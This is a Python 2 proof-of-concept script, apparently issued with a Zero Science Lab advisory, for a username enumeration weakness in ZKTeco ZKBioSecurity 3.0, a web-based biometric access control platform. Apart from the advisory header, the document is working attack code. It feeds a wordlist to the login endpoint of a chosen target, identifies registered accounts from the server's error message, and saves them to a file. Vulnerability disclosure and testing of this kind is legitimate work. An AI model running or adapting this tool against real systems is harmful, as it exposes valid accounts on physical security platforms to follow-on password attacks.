#!/usr/bin/env python # # # ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness # # # Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd # Product web page: http://www.zkteco.com # Affected version: 3.0.1.0_R_230 # Platform: 3.0.1.0_R_230 # Personnel: 1.0.1.0_R_1916 # Access: 6.0.1.0_R_1757 # Elevator: 2.0.1.0_R_777 # Visitor: 2.0.1.0_R_877 # Video:2.0.1.0_R_489 # Adms: 1.0.1.0_R_197 # # Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security # platform developed by ZKTeco. It contains four integrated modules: access # control, video linkage, elevator control and visitor management. With an # optimized system architecture designed for high level biometric identification # and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced # solution for a whole new user experience. # # Desc: The weakness is caused due to the 'authLoginAction!login.do' script # enumerating the list of valid usernames when some characters are provided # via the 'username' parameter. # # Tested on: Microsoft Windows 7 Ultimate SP1 (EN) # Microsoft Windows 7 Professional SP1 (EN) # Apache-Coyote/1.1 # Apache Tomcat/7.0.56 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5366 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php # # # 18.07.2016 # # import cookielib import argparse import urllib2 import urllib import json import sys from colorama import Fore, Back, Style, init init() print '\n-----------------------------------------------' print 'User Enumeration Tool v0.2 for ZKBioSecurity' print 'Copyleft (c) 2016, Zero Science Lab' print 'by lqwrm' print '-----------------------------------------------\n' parser = argparse.ArgumentParser() parser.add_argument('-t', help='target IP or hostname', action='store', dest='target') parser.add_argument('-f', help='username wordlist', action='store', dest='file') args = parser.parse_args() if len(sys.argv) != 5: parser.print_help() sys.exit() host = args.target fn = args.file try: users = open(args.file, 'r') except(IOError): print '[!] Error opening \'' +fn+ '\' file.' sys.exit() lines = users.read().splitlines() print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines()) users.close() cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) results = open('validusers.txt', 'w') for line in lines: chk_usr = urllib.urlencode({'username' : line, 'password' : 'noneed', 'loginType' : 'NORMAL', 'un' : '1470746177485_7049', 'systemCode' : 'visLogin.jsp' }) try: xhr = json.load(opener.open('http://'+host+'/authLoginAction!login.do', chk_usr)) except: print '[!] Error connecting to http://'+host sys.exit() print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET for key, value in xhr.iteritems(): fnrand = value break if fnrand == 'Username or password is error.': print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.' results.write('%s\n' % line) results.close() print '\n[*] Enumeration completed!' print '[*] Valid usernames successfully written to \'validusers.txt\' file.'